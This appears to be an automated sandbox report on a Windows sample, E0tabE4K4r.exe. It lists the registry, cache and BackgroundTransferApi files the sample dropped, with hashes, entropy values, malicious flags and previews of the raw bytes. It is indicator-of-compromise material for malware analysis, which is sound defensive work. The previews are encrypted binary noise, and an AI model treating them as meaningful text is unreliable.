                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.976961365953192
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:VzJBfhG+/O8bslA+9YTf9OWxuWmcgWLv6SXCvKX47bI7OrW1Iu3Y:VbZvxwl9qVOWxuGLiUIko
                                                                                                                                                  MD5:287CA15CCDE314C05B9330BE6BBA6363
                                                                                                                                                  SHA1:A0D2B58CE6446852DF2C61589BCC472FB54B05FA
                                                                                                                                                  SHA-256:6C080269E7201902DEB24930B6CA02E123978ADF019BEE66BD3A8420E3A9783F
                                                                                                                                                  SHA-512:10C509E2338094D659D3C9D7A231451ADAE9B158B0F48766BA6CA908DA83C9918B1D8AE0758ECA8784AA307412709BD6B7F7FC5AFB05E4B4F8BF83BC0FDDFB7B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:regf..J/(...A...B=PJ....~eV&{......a..f<.|.........'!.7..s..eo.@ltc..q .r..%*..)9i....v%=...+...Hi[&..k_g..>\1.t.F...^.pBs....2.3...*&.ax....9...*ji,..8;..........a<EZ...O......V..S;4.T5.K...D.+.T".NcyzK@u.>.@7Ci|.H..G.<T.v.V....L.h.y.x.f-..b8YJ..~..9lT3...3..$..-.......X....r.&.y..q.a......h\..S.W*.7...n...H.{K...!....m..... #...&g.........rY.8.L.........'..-..X..). 5h.q.L..Q...YQRh...*...........Q4.n.....\.X.8..w...........:Rp.\.E..C+.N6..N6.2.1...p...4...n1........m{~.g.G.y-..h..x<...}..Sj~l...Z|.'2K..DZ...._.....j.3G].62.t..FS..Ar...G.]...S.......U..4 .DC......1[.l....H..F.<6....B..2.....5". <4....]9+j.s...!.-,..a.BG...M.5.......v.....,@*...?i......R6..s..Nr....(..M.%..9.o65O...X....It.&.G...,..!.....e.`.-A....M.{.L3.Qo...`./......Z.[.#.......$.<M..p#.....d.....[....o.i...bx].d....J..w(..O.t...iu..~5k..[JY.h.7..:.....]5..E...B.....R.O'.?..a..,<.D..I.4.....=...5w.....e"..Zn...jx.....1.F.}..%.G..|\.m.......U1.u.O~._._...|...%hh...r ..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat.LOG2

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.978407764973218
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:sb2iraHZ53c9EKKBIhmTZwtU33vk/HR6hs+8sz+QmcW45mpNVyTNsA/Ld+Q:rireZ5M93EKDms/HAHxlWesV+/T
                                                                                                                                                  MD5:0B633588F08C22F70AC5441D99FD243E
                                                                                                                                                  SHA1:9B8932A442376C1C8163B6090C7A863EA5019F93
                                                                                                                                                  SHA-256:FBA348654977DDFDA02325A4112FE4502706D10B25A16BEF75ECDD1067F06005
                                                                                                                                                  SHA-512:416B89D6FFA240AD6725E3345395F834DC54B1576282E45B554DB1A776227AC62D5C8D8615439CEC0786ED2AF0F04F6F79B6F3284B364EFBA507D77C47718F1A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:regf.P.....R8.r6S..<:...F..XQ..;a..6.....$..1.`ECS8.8...]._....QH.m.#m...a.g.wK.X...6.....$w.......).{.[..\<..V....N...eI.m0.A6.$....5].,..)...x9..z2.Q...+YA..%....`D...<...5^"b.<.Z.D.Q.G..........u.hj..;O...&.X}Y..j.&>..4.X....Ip..*.S-y........n.....=^..W.5.-F....o..'.L...(n.T*...7L....%w......).d..b4...\n-W.3..+.t%...&.U.-0^.dmnch..e...0]e.0....-.8?../2=z...H....9y....6..[2.X......7.~.Y.|uV.['....L..XRD.z..7..N..D.y....~.8}.G]..p.....\.......^.S.G {.....3V.}3{..$r+.=...iF.IOh..6oB..\...b...[1..L....`.....'..5.K.,!.....qJ.u...U._.......%9....zw.0....}..C....B...S..w...`...o.};K.V[W0C......CqE..z.?|.^..m ..i........W`...#......A^..+._X7..P.P...]b.....X.1N..\.W6.........~P..'+K...z.$Ta...+".5...p.16.r..c.......L..D2.........u~Yz.=v.1~W.nr.-..!.4.P...:.3.T....r.1...ns.N0H.6C..^.N.F..p...J.>Vz......|...9/.).ps..n .:.,.2..Fv....L.B..R.]..b#Y>.....Z..64....n....j.1y.....................q/qiac.".o. ...Z....e... .5.+.%.p,K.0.8..s.9.Z...J.&.....8......

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.975025325797754
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:C+wJTVaGmgxYUWdw+3pbSu9ZksTJApTcOxZaYcVvJ6wJjvYnVknrrF9ZQ8:C/JxaGYUiVX9ZksTJ12ZPc1J62jQnwfh
                                                                                                                                                  MD5:5491503A42B56254C4326911409BE188
                                                                                                                                                  SHA1:EC4FE2893D896A232D5BB8DC07E0B9AA0C1567CE
                                                                                                                                                  SHA-256:62EB8434FCEFBFE2BF17615E4421B62246956003701EEC023089232B1C58AF5D
                                                                                                                                                  SHA-512:462532EA249BA9F0D466719A9724D8BA10DCA0608B8089D8B06D967304B719E8912FAF1E1BD417609855F9B612AE5CF11120900E0E19DB9674FAF4F32AC239AF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:regf...N.*.e..5.!d.^..Ay:.0N..hn...,..b..$..5..2.r....:...f"U....A.......A#..j..Tl?B.6f..Vz..U.u....1Y.t}f;.7.k...Z+..s.(..O.....=.....j.....g..#H3....A......m9).......t.2...Of...(S..p.C..kn?.P..6i., ..v....3.w..i...&._..0........D.=pH...E...9c...*8.s...]..YGny.z.rB+2.....S..A.m{}-F.Lrd..T9.yVy..@.O.e..RK.d.XB69v.;..MqK...s...gv......O.m.Xb.HO..w.x...a..U.Ap.{h..T.XMW......A.]._t...2+....V..7.....:.(....X..z.b..~r..%=N..an.y.\........=.!'.{....=|i..&.%.a@...k.r.....a{M.)....7Bh=.n..P[.......w.o2.ss.9O..P|.J.9...oDB....0...a..d...s..L.L...G...`trS..-....m.!|.$k...p....8...3.Vc..$.5..@.....zM.'...ZY.E..........,.}..I.z.....S].....Y..I.z.J...oP'...f..l|)...#KB.}......y......:.....+e.Lg.b_t.."4.....s.R|kD...8d%...o.WyT8..;.H7..1K*j[5.DY.....H.2.O..w.-M.9b..}>...jZ...'Y..Uj....^...!..\:.W..2`..x...[..a..E5...=AA..=..7...[%.e.....v...o.[D=m=y..rpp.0Q.......Fr9.&U3...-.D$....W..A}'.#5n...u.y.!..0|:...D..m...b......@..R-i.6....._9D.J..}k#

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat.LOG1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.9796888550192495
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:IZpYR77Ru2mNeMBJKx0mMoK5I5yPUAAswxe1w1fa/+b:02qLBJo0mTKy5yBwxe1URb
                                                                                                                                                  MD5:ABAC0DFCF14F9821ED7DF2F2B820E2AF
                                                                                                                                                  SHA1:88F730CBA8FFC7B499479BBF37F9C594F41D047D
                                                                                                                                                  SHA-256:E4FD28AB64C4705B285650A41B713508B70C3219D2A19631F535A2AF115DE72C
                                                                                                                                                  SHA-512:39B2DEFB4F8CE806AD2B8A2FF7F87D8F17B18DA4216EA8AAF7471024356A65B29C41422B5F6DB31F3C3897D35FCBC469587A5658ADD35420405036E7E547F4D5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:regf...(..L.Q..H.a..AcD..[..!.0~..1...U..... ....m%..*..j3..t|T./%....e..*.zCd.5z.1..%.m5...A...,<.Y....L...{....E+...Pl....<..b...H{)..[.....%.M..w..zf.T.L\...N.=PW.Nz...@.....qS......~..W...Y5-..E.n..GcC.2W..w.~.R...%..oj......d...QU,E.....o.....8..|..^..`.Ad.........E$I....q...+!...T.Vr.T.Wo1.@.'../..]y.e...;.._5.%N...W%....-.......]H......5..K_....u..Vl.d.&#..U..d4?...)..Q5..M..d......~&/?.N.....`%..'.@.MZ..,.\v....{.z.7F...j$N.....:..K(x..A.bc..|#....u....|...."..Hg&...s...*..<.,..7.rp......V}`.-u[MC9m.........|1....&.E...t.......9..#........#...a}.%...l.......R.6H+_mY.k...V."..TI..s .V.[c......kie.rH/.......w...%.Z.d..>.E..a..&..q~........e#.-.QZ&...t.9.C8.(.]..):...!.?l*X.X.b..L.).[.......B.$,.........,x...SP2..%...{'.o...&k.>U'..D.[....m`...w..2...X..3.9.B......T..>n.D.9@........x.q...vJ?.A!}7..i...e..N...v.eI.N..FY. .m.. .[lt...k.~.?....g<.0>R7.op...p.G_w.....6.P..T.LG..f.Z,g..."[..M1.;..L..~.m....rS.+....W.2...C..2.94(.u$Qt..B...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1573198
                                                                                                                                                  Entropy (8bit):1.330435523895476
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:FwVEZqi/74ow/0UuJ2Dmt7hZXgW6mghcC8wq6LoJYF3T2Swxm0FaCaX:+F8w/0UubVzf6NhcC8wlL1FjrSm0U
                                                                                                                                                  MD5:EC98223404D49A47C3AD93F6D4503EAA
                                                                                                                                                  SHA1:BA1936D39BAD0DDE8DFEEFCCFE420FA3AD4E715B
                                                                                                                                                  SHA-256:7960371E59A2B6CC30A5AC4F7235DA6C67722A98393F80DEA60D899BE8458001
                                                                                                                                                  SHA-512:9AF591B861C66011AECCFD821BAE8F99E18BC66471FFBED2359D19EABE46240AD27A723ECAB86059C47E0620B78D5230D249DA4298ACB4E09BE096B57A3B95B0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:R7M6.z...".. M.-..........s.T.........`.'.[Z.5Q.Zp^-4.."6..b*v..) /V.-....h0.\L.WP.`.P...R.....V...7......t....s...a.ss..MQx...B.B.V..:....V..d{........P.O..K......H7N......R?.1..Z'..{B...6k..j.......}C..._1.!K8.R...~.U....@.Z...K<.....c4*.L...E{..... .zF&p...N.......V...t&X.D|.xY....\Ot.H....J...j..;Y..v.... ..i....}..?....&..4?.JN..$..N.3...a....>E>...%1....U5....i.zc..`..)?v*RF(V....C....Q....H.....t.....);....s...v>...b.b4^.X...s..n4..[b...s.M.mMm6...|.G......g...Wr.).}.t..a..._8SB7.Y....Cj.v..w.\{9.t......`..k..\..6.3..........7...b..........X..z..8+D.....!.U.@....ca..{>U..4L..*,...7"@..Ad.)...2.(!+..u6...S.^.....ET.c..6........4.w...u.x..3.\+NM...$."...0..<......_//'...K...k.<.9.. q...+..oR.s...l.<......nr;d.....]...9....6...>h.P.w.=<...;..r...g.y.......v.G..G.@.......'..n..S...JT...v..e.yn.&..e..7}4........R.7u.@...@..z..p.1:.]...@N...i0..h.....w...5)^...y..<..;....ME.K[7ZX.R.M=.."iF7.S.....7...'.......A...rV&y....._.1.Yp.......o:...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.990163647156961
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:QK0BjuwLSj21rNSBKCfFb1k8TGbRkAieQgjRmxAH6HEElV4:QK0BawrN8KCN1KbRkAygj3H6HEEY
                                                                                                                                                  MD5:6CCF1C02B432B0ECDB0DA25C2BF9A4AD
                                                                                                                                                  SHA1:B7CA64E48E80F82B4C17A912534AE30834CDC9C3
                                                                                                                                                  SHA-256:15876748E4AF054C9B6D1DE09147EDAA4ED4D28EE5A8E0FB5A3B36560A03430E
                                                                                                                                                  SHA-512:F59AF80C46DA7D31190617C14F10D492A51EB188AD27F0B95A9435CC76302D3AA42ED94E7CAEAD0671D073F30030B0FEA4BE85CDC62D948517CE09ED7F415200
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.a...8g..(4.!I.7.D}=.2V.,.."v.....qZ....~..q.o..N.\I..06...G.<.}.#....F.Q."x..8..{&..C.....A(.7b....o!..#....c.q....Q.+.......{.\~......D..k..6..e.c............-.....1u...d.....4..%G..!l.x..'#....;.k.YR......Kn....rwU.!2b....T.H.....,.-K.f.O.6..!OFt.i..~..0.j.y......3......->...W.3.$.......f*<..At.hH....F.eS...x...J.:0B=lQ0...(<.l(x.uc...Ho...........)>...y..W.........w..t.)..t.Ko.D`v....@'.1..P.....G.Q.Bt1..L...j....,..^.eq.?.. ..xu.7..*s...P.Nw.z\h....".M.1....].F..~.J...L.ot..<.M..S'm........:cSNfXP..^...BY.t...... rs.[[.7.......E.F..mW....n7..6]..S...r...3.1'v....e..]-...5U.A~~s..P...*3.d3..9...q.\.....=OX/.r...H.8...-u.z{;.2.D....76...,....2.V.!..l..n.qI._...6..D..=Vn.._5.....I...D.....e+j%..[...J.G|g.9u.v)J....v....Pc..9..$.....o....._. -(.....s*.z.#.`....q.+.#. +........}H......Y..$$...z......5..|.p.:8..YhE}.>.p,v..sQk..:.T..Q.n~ ......I..%o..H.|.H..T{].......4........I.Iz[...s....!M..%.e...S.}.R...........v..j..h.T}...C..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\11a775a0-df55-4340-9960-2d6cbf5a7c9d.ddb989e2-6da6-40a2-b7c7-7ed6d42107ac.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1658
                                                                                                                                                  Entropy (8bit):7.8809887358438075
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:o5XIqAYM2hFPULooKb8jEtAZa9hgKMzCo71ODECD:oRfx4DZEtLhgRzCo71ODT
                                                                                                                                                  MD5:A601DB1E01EE14129335A094B9F60CFA
                                                                                                                                                  SHA1:C553F176B9E08A00C1030CDBD006DFDCE481579D
                                                                                                                                                  SHA-256:1F8829EADE6007834F37E4FBDC7C2A838A6B10E48F84CB8E25F18C1E1F3D9F12
                                                                                                                                                  SHA-512:8A54123261CF9A98D1A561EEA3CA49D3EB9984D7148CCE9D470A4A65D686013B0AEF563C616812A3D45ECC89E143CC7DA54728ACA0F32E0A5E1265E590359262
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t6..FsoXQ#...Z8n.....X.V..dY........|p....{.....7`.W[..._?G.d.+8..dG........9S.6IvY.z.K..*....!>.J~.N..W.M..l.,j.f...c...fw)m.rT....N.+.C..H>.K.H..wv.W?...n.e.......f..fS....k.g.6..C..QGxF]...{"...V....#..L....Y..s..aO..W..m.u.<|.<b$....x._..v..|.Cl.$X..Ziz........P.+....\N.@.IC$+4..D_..9).Z#8-.=V.# ...e.P@..^ ./.9..=V].]C.u....Q....h.O....../...F...PG..>C..C.p..][.]y.C..$..].2l....-...J.....O.........7=IB.D..p...g..S.(..*.i.,G..h!).|.V..8.].../...$aa.{.Bg[4Z.IP[.A....}.r!.a...@"...x......Ty...l..j..o.r..9..@W.H..*...G.u0.$..L.!P..X.+$FS..Z5LU.....?!tfg...ym.}..F..o"......2..g...u..;U\w..3F._.7.3.{..{9m..C..ok...l.\......).<gk.b..$+N......IUk.D.J.......>|'..1.8H....^..g..Z.Jz#.<..}pl.U+...U...F5..3......d......!F.i..wJnL...)K........L..%,...&[......=M.n....{*....D.....ZZ....p.(t...e..wS.]0.&...E....h.').....C,.8h.#B(....ay.:...=.,.k.I".4M.=....6.{.L6......1;..........H.........z.b.."R..)...`.R....P`5.T[....N`P.D..r\u(6.I.G!.{W=..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\11a775a0-df55-4340-9960-2d6cbf5a7c9d.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):836
                                                                                                                                                  Entropy (8bit):7.713151738440081
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:BkJ0uf4FvTM+PNVl7Lu2OzSraqoXBD0bRi9EWYaMNkVE2syPKmKnQXgkMJsSUdNX:KffcVle2Oz0a5RD0PhNqKmKnQXtMh2bD
                                                                                                                                                  MD5:A1ADCD809A6B4F0B397922CFFB619186
                                                                                                                                                  SHA1:1389860AA44EAE37175A627995D753710FA224D2
                                                                                                                                                  SHA-256:89DB677E3244891AD4D88D3E5AA1485C45E725A1F816504A25C3170E031FB8BA
                                                                                                                                                  SHA-512:3DD0DD591BB347D2C155AD849D24140C8B1EC2343EBF4834B15D7E29A8A5A5CFFD9FA4782A5CEA9F71FB30FCF963E46045B98A756E727F65CC900D7487319DA8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....-.:oL@..Kw...fAX...L.#0=M;.@.....?W..M}...Bv..aq/..\.x4B.Q.`.[.f.0.v...X`.r.q.!V.p.........<^..tD....*G..3@L.g}...lU[...p.....c.h....B......O.9...pg.F.1Y.6.........U...W8....K......9..~r..2.|9.....8.....[ :..x..}.<.h.i.... ..._:...I51.M...r....1.?V.K...fnm.TN........5..o1.U..Od.g....}.....B-w...W^...D..U..........(c...sRx.c,C...A..}y....;....`...r{-+.@.s....Z;f#...Q..t.H>&h.]N...j.tf:....F...K.F.F..Z#Q..#@....e...7.@6..N_.`...{].u.[6u....G<.rP..t..C^=r...bP.^.......m.....R.c.g.....Rw.M8.O.....S....."!.o..{.......jD.>...$..W.W.\.....h..+.<.N.`l..C<.....W..3.....u.B....8.,@.........(.GL....i....)..WC.c..<.n...Y..;.<..+........l...&..Yl+.w.U>:..w.g7@.m.....q~..{u; .....|$..p...w....v.}...=SH.{.`..OmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\1460f7ca-9284-4321-92f4-c582d067a7b4.5b8deab7-260c-48aa-9eeb-2a93de93025d.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1428
                                                                                                                                                  Entropy (8bit):7.864210517981899
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:IuCnybd9ps8YxOoCgGbqhoxMjdjI8JF5kJoRfIzCeMxELLWpaUzBVoAuYCpZ2bD:IrnyzpsrfYqhpjXJDNRQ+pRp1zBORED
                                                                                                                                                  MD5:5BA3241242D9D0C279743BFF2C4A8E4F
                                                                                                                                                  SHA1:0B63E81D354131F4FFAB9B13E6B08F1BDD3CAA47
                                                                                                                                                  SHA-256:E6BC24C511B683BF8FA179E116773B2C71BAEE774A5569ABA3077A7318ACBBF6
                                                                                                                                                  SHA-512:3C0BD670833023D3796D2E28F21C51754D8594114822A75BE09C391450A88E58A761CB7E6722BA9F5ECBF2A6692DCA1ECECB9EF30281B76B98F2B8E6CC1D5C2A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t.....d`c.....1.....v..0...s..hKE.{..`64.7^.xN..N.{.Kc'...~./._".ea..k..hU.n...:..-e...i...#..E.t....C.a.s.]..d.Mm.P0...r.0.v%..>.1|]<8.2^.....u.9(../....L+........T.....A\..n........~YU..>.(."...V..]..i...j..t|.'G...H..%{...K........T5...`p..C..]....@|..W.5..9[Md..m.x{(.X.z....v&....i....H.3..M..../....hW.H.7b..........V...}.F..7.u.%j.U&i.....Q..##.].l...Q).;..b.Xj.....+(.~.d..h!.....x.?7.\.8b...*.OO4.G.?K...1..Z..w...,...r1z..W.o.!.:.n..o.y.p.s.`x.-*..RL:.Y$.#..~.wXnY.63f..<ACN...I.E.QqL.oG.. .%\.5t.a..sl. Z....~.?......I].]......ZSZ.=&M3.C......'Jd#...: ..[...2C.0..&..9U..5...B'.A....p....)..F.....S.....`nV;,..g.M$.;.K...n..Cv.].Z......-..4..VN......R.V\.}|.e.P.$Z..e...v.h......n.V...5....,..D...<M...&..9B.......A.....?...}.xn'...-S.n....P.T&N..!'XO..v.....O_..Dp.f/_r.\.=...go.@.D...#/1.._.<4.....UT.(..E....q.I0UT....f...5!..c...5.....m$e.V..*`V.`..=j...........bC....7n...A.......gT...!Uy)...R>.;.e..q?......f.B]...8M....F...Q2]Wv=M.z.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\1460f7ca-9284-4321-92f4-c582d067a7b4.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):964
                                                                                                                                                  Entropy (8bit):7.780788561583316
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:oHTE5VhFdX572ZBVJkBfTvw+p0cu/y8ckPUIfxBatfNM2bD:+TE5VhFj7cqdTPe/PnutfVD
                                                                                                                                                  MD5:F5FE104A12B42230C6548727E2E6D002
                                                                                                                                                  SHA1:8B776BBB62C33C920DC99E9C4081B22B11B672D5
                                                                                                                                                  SHA-256:B5B0755FAA26B1FDC1D59D29D011321352B89D1FD76989E309FD58F49AD4D5BB
                                                                                                                                                  SHA-512:42FDC6C6D55D580F9811A3B41C629C170F8B7662D3CE659DE2A42D17C11EEE6A7C86E54060A49EAC533C63F0E440C0407939888CF4CC4A96E64480F3BAF86A21
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....t....&..F...l..<.x>....<..m...b.W...... .....F....T.|xk.huP.,.M8.v...J.U.....@P6@..*'.2.c.LTo.Y....rh.S&y=."N....;#.."..m.R....*. ..T{.:.i%4E ......^/....B..:..).|..-.8,'N.=8....d|RvT.........7!.......9.p$.-c5.O..^].iD..C.)...b<..oF_...T.?..K.....kFF..%>s7....n..-.8.!P..:..i)...M.h\......j.hd....=..D.@.^.{.`Zw.Sm ..gO......1../..u.GY..\..1.6.<&.....%i...<@d....V..G6....@.O...,~..@>n4.....+.q....;)...>......l.1..h......z1.....W...B.I...5.{.Q..9..K...K"..^D,...H.{...........r...E...)jd..F...W...$.....t_...p......$....n$O|.Qj..|.h...N()Jnw.04.{1.!....PU>@.....;.z..U...C..t....;/...e.&..4uB.?cm...F..R.+....z.]B$I...`.u%......o.FD...k..5.}...S...|e<^.s}.d..0...5..`t..#?.Fl..Je...hNW.1f......*.....w..6,/"Q.F.0R...D..t.O.c...`..Y...g.e..JSDe....[..a._.Eh.f.`..nn...bB.h..80.p3......M..Yj....\..|.l.8y.7......w...%G...J.h)....f.1....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\25cd484e-d5ed-4939-bfc4-8e23bd442110.79096d01-25d9-46da-af43-25f533e7233c.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1426
                                                                                                                                                  Entropy (8bit):7.887143540441913
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:+H2m0feJDwLtTZk4/KReMVJjSflnvEv5I5V/NhryIzq431K6jMOCaUgYa+RzGYTb:+HWfaDwL9n/CtOlnvEBYmvIMhCY9RK2b
                                                                                                                                                  MD5:176B03EB0278F85B0B15AA5F1A2C66E0
                                                                                                                                                  SHA1:C11961398AF8234BEE833E7D7910FE93D8FDBCF7
                                                                                                                                                  SHA-256:F7A933C59F14433C2468EE42523086EC184C70CE4B668F776D217938C702F098
                                                                                                                                                  SHA-512:4866BEC5BA23EC390DD8F199FD5722D8AADC0DCAD521E76D97BFE95C79EEDE2C01F37091748FBB34663365447A6E16C34E244933D451F2437AF5D85485D3C5C5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t.4.....=F7..W.A.Z..u...Y.@..IDRW_/1^t...^B2...j..EF".k%O..).....=..\....#.#...1AF......7.......w..)...Ym..*.(....^...>,.8...i.V....c......)....O... z........V@......|'ZG......V.?8.?....%._.4...0a.I..1..4P.;h.^....'K.Q...W..@..5..a..A5..K..#.p5.K>+......XC...B.J.E.H..B..A..S..M#..,Y.K./.........}...o.]jh.^.uG..y...s"b....+B..'=.....+.:.<wnL.>,F.../B..bV1.9;....>vm...e.946..M.6._8#...2.l)...>.G!.....D^.@PTh@......fg..R_r..t...[..?.1.}..$E..u_.A.,..~o.U...s@}.|.&p.(....)...e....:'...C...R.......]B...}..<...*.M...Q.vP..}...*o.u.Gi.2I.P.t...$.|...........Uq.j.:.d...e....t...GW..U.<..u...6Fw.y...00..B...6Y...n.....US ........^z].Pw...1..k~..?].{.P..F.).._.....V;.[9 ....|...C.^!....L.W.n...S...(..j....|f.TC.7b..Q..3.x.$........?......@.....b.u..P..5.K.?z..W.b.a.....5...A.....k ..Y.L\.. ..s>W...#.zH..M..)...~. ..[.w.N..MN.*...F].Qs.........4+...\jr!*.Z`..l(..;..w...).>+..x..Dy....FFkR.O.xH./....A..r4I.....f<..?..O.I.d..g...c..%...,..,".

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\25cd484e-d5ed-4939-bfc4-8e23bd442110.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):964
                                                                                                                                                  Entropy (8bit):7.759673934043882
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:OIjLUq/wpBI58ocFxN5/6gYA37kon51Zv/XQJS7/2bD:LLUC5O7v6kLk85/QJSQD
                                                                                                                                                  MD5:D0D980C89D1454869EA6CF8D6DD9D055
                                                                                                                                                  SHA1:C2BC1282E74A3E0D78F662EE9493953642E7D92A
                                                                                                                                                  SHA-256:F9204576F9F1350AD27018277DDD90A6E1789FA9F14395D37903F423537A6854
                                                                                                                                                  SHA-512:6524DBCACDFC6D736FE3F6907C5393BD9B5534D6B291053187981745298044146D99EBAB9DB513919178A443F21C9AD4C68B18B58C3D1F9E09470D5C84FC387D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:........".HN.....6.j..^.BFM.|...e316F.g........zY...Ww].M..@.....]G..w<.;.n...Q...7.g..}...f...0.6...=\.&R.W....#u,.......0.....}.b*.4.....O.F).N.(.....9F.R..5J.+i....'..@=.j+.+..9'/...f..E.d....\.?F.B..D.{..D.Y..h.O...pP..`....7...y.....p.t.w>.~.b....@.....>...Ig....l..3..B..z.*.p.'l+.....Ggl.]..y.!.i.O5...."m."#...U...K|....h..X .5%..Q.{........P.....?.......<5+..H... T..(Y...`.g..$$..RZ...?...RB.B.\.S.&:+}..g...n.<.5j..........g.....3...m....;..-..m.........}.+..5.g..uH..4.(.j`....j./...j......#B.\.m.e-8.K.-.pA4.'........5p~W....F1...5.HsD...vD..v.1E.......|E..)0."............K)o.4%.[.......s#<C.......=\....g...1S(..UCT.....b..Q.b..(i<!nP..g.pB*&...T.dAS.^-..h......y.Z...g5+.|..=......MAJ..J....4.".....En.6.3E)..(X..!.xz'..H:..%'e......g.A..U:..c.j.2;....Q .k....Q.j.x...k..>.O....."..&/..`R....aH.i.g=.F.\.....a.....<.Q{..*mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

